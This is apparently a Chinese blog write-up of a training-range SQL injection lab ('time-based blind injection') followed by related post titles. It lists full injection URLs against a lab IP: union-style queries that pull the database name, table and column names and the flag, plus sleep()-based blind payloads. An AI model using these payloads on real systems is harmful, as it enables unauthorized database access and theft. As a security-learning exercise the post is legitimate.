2. 程式人生 > 其它 >WEB安全-SQL注入漏洞測試(時間盲注)

WEB安全-SQL注入漏洞測試(時間盲注)

阿新 發佈:2021-12-01
前言 這是SQL注入的第八篇,之前忙著學校的考試,現在結束了就可以再專心打靶場一段時間了 連結如下:https://www.mozhe.cn/bug/detail/ZEZ4REhOck9KMnVKMjFLTitQWFg5dz09bW96aGUmozhe 正文 首先明確實訓目標和思路 進入題目,發現情況如下,得知是時間盲注,直接上手開始驗證 圖上已經有提示使用?type=進行驗證,不能像之前一樣進行?id=1,正常是先構造閉合,最後發現竟然不需要…… http://219.153.49.228:41617/flag.php?type=1 and sleep(100) %23 1.根據回顯資訊進行注入 判斷資料庫的庫名長度,但是在操作時,發現有回顯,感覺這道題應該不止時間盲注一種方法,尋找注入點
http://219.153.49.228:41617/flag.php?type=1 %23 通過修改1發現下面的名稱也隨之改變,說明1是注入點,通過該注入點獲取資料庫各類資訊 獲取資料庫名為 pentesterlab http://219.153.49.228:41617/flag.php?type=database() %23 獲取資料庫表名為 comment,flag,goods,user http://219.153.49.228:41617/flag.php?type=group_concat(table_name) from information_schema.tables where table_schema=database() %23
獲取flag http://219.153.49.228:41617/flag.php?type=group_concat(column_name) from information_schema.columns where table_name='flag' %23 獲取flag為 mozhe1 http://219.153.49.228:41617/flag.php?type=group_concat(flag) frompentesterlab.flag %23 拿到key 2.時間盲注 判斷資料庫庫名的長度,在爆破中發現12是缺失的,說明是正確的,判斷出資料庫庫名長度為12 http://219.153.49.228:41676/flag.php?type=1 and if(length(database())=10,sleep(10),0) %23
之後爆破資料庫第一個字元為 ascii=112的字元,即為p,之後的操作直接sqlmap,不做贅述 http://219.153.49.228:41676/flag.php?type=1 and if(ascii(substr(database(),1,1))=112,sleep(100),0) %23 總結 做完這些靶場,發現sql注入之所以難,主要因為十分的多樣,每種做題的方式都不同,而且很難找到一種適合自己的做題方式,還是需要多磨練,不能想的太死了 一個小問題 其實在使用第一種方法的時候,剛開始是用單引號作為結束的,但是到拉取表的時候,沒有加#發現始終沒有東西出來,之後看了網上給的資料,發現是直接加#,沒有單引號這一說 後來再次看的時候,用這一串試了一下?type=' %23 ,發現回顯很有意思,如果是雙引號情況也是一樣,但是加了括號後就不行,這裡是前面的引號和後面的形成閉合了?不是很理解

相關推薦

WEB安全-SQL注入漏洞測試(時間)

前言 這是SQL注入的第八篇,之前忙著學校的考試,現在結束了就可以再專心打靶場一段時間

初學Web安全sql注入(四)—— (1)

當你的輸入沒有回顯,也沒有報錯的時候,但是輸入正確和錯誤的值時,頁面有不同表現時,這時候我們可以嘗試使用布林

Web安全-SQL注入:MySQL注入天書(5-6) Blind Injection

文章目錄內容布林型##########注入點判斷撞資料庫版本撞資料庫名使用sqlmap做布林型的猜解

[Web安全]SQL注入總結(一)基礎篇

[Web安全]SQL注入總結(一)基礎篇 搞不懂17周了,居然還有很多課要上,sql注入有點多,所以分開來寫,先水一篇

SQL注入漏洞測試

測試背景與環境說明: 公司的監控系統對於使用者登入/退出、許可權修改、重要的操作都會記錄審計日誌,日誌儲存在postgres資料庫中。此外,還有一個提供審計記錄查詢的客戶端工具,介面如下,其中過濾輸入框可以輸入

WEB安全-SQL手工注入漏洞測試(MySQL資料庫-字元型 )

前言 目前鑽研SQLi注入,這是第二篇,靶場名即為標題,連結如下 https://www.mozhe.cn/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozhe

Web安全-Joomla核心SQL注入漏洞利用

實驗宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!

【從入門到放棄系列學習筆記8】web應用安全基礎整理-SQL注入漏洞利用

一、SQL簡介   結構化查詢語言(structured Query language),是一種特殊的程式語言,用於資料庫中的標準資料查詢。

SQL注入漏洞--和寬位元組注入

注入的一種,指的是在不知道資料庫返回值的情況下對資料中的內容進行猜測,實施SQL注入一般分為布林和基於時間和報錯的

一道題講懂SQL / [第一章 web入門]SQL注入-2

概述 本題是一個題,可以基於布林也可以基於時間,如果不會的話可以根據提示在網址後面加一個?tips=1降低難度成為一個基於報錯的

墨者學院-SQL過濾字元後手工注入漏洞測試(第3題)

墨者學院-SQL過濾字元後手工注入漏洞測試(第3題) 前言   一段時間沒做SQL注入的題目了,更一題SQL

墨者學院-SQL手工注入漏洞測試(Oracle資料庫)

墨者學院-SQL手工注入漏洞測試(Oracle資料庫) 前言   靶場地址:https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe

SQL注入漏洞過程例項及解決方案

程式碼示例: public class JDBCDemo3 { public static void demo3_1(){ boolean flag=login(\"aaa\' OR \' \",\"1651561\");//若已知使用者名稱,用這種方式便可不用知道密碼就可登陸成功

SQL Server手之延時型時間

近來處理安全問題遇到的sql注入: 延時函式 WAITFOR DELAY WAITFOR是SQL Server中Transact-SQL提供的⼀個流程控制語句。它的作⽤就是等待特定時間,然後繼續執⾏後 續的語句。它包含⼀個引數DELAY,⽤來指定等待的時

Drupal<7.32“Drupalgeddon”SQL注入漏洞(CVE-2014-3704)

一、漏洞簡介 Drupal 是一款用量龐大的CMS,其7.0~7.31版本中存在一處無需認證的SQL漏洞。通過該漏洞,攻擊者可以執行任意SQL語句,插入、修改管理員資訊,甚至執行任意程式碼。

SQL注入漏洞的解決PreparedStetament

JDBCUtil 工具集 package com.imooc.jdbc.utils; import java.io.IOException; import java.io.InputStream;

墨者_SQL手工注入漏洞測試(Oracle資料庫)

靶場: https://www.mozhe.cn/bug/detail/M2dRRXJqN3RqWnhvTGRTK1JJdjk5dz09bW96aGUmozhe 背景介紹 安全工程師"墨者"最近在練習SQL手工注入漏洞,自己剛搭建好一個靶場環境Apache+PHP+Oracle,PH

SQL注入漏洞--報錯注入

報錯注入 報錯注入在沒法用union聯合查詢時用,但前提還是不能過濾一些關鍵的函式。

[sql 注入] insert 報錯注入與延時

insert注入的技巧在於如何在一個欄位值內構造閉合。 insert 報錯注入 演示案例所用的表:

Django GIS SQL注入漏洞復現(CVE-2020-9402)

漏洞概述: Django是Django基金會的一套基於Python語言的開源Web應用框架。該框架包括面向物件的對映器、檢視系統、模板系統等。 Django 1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x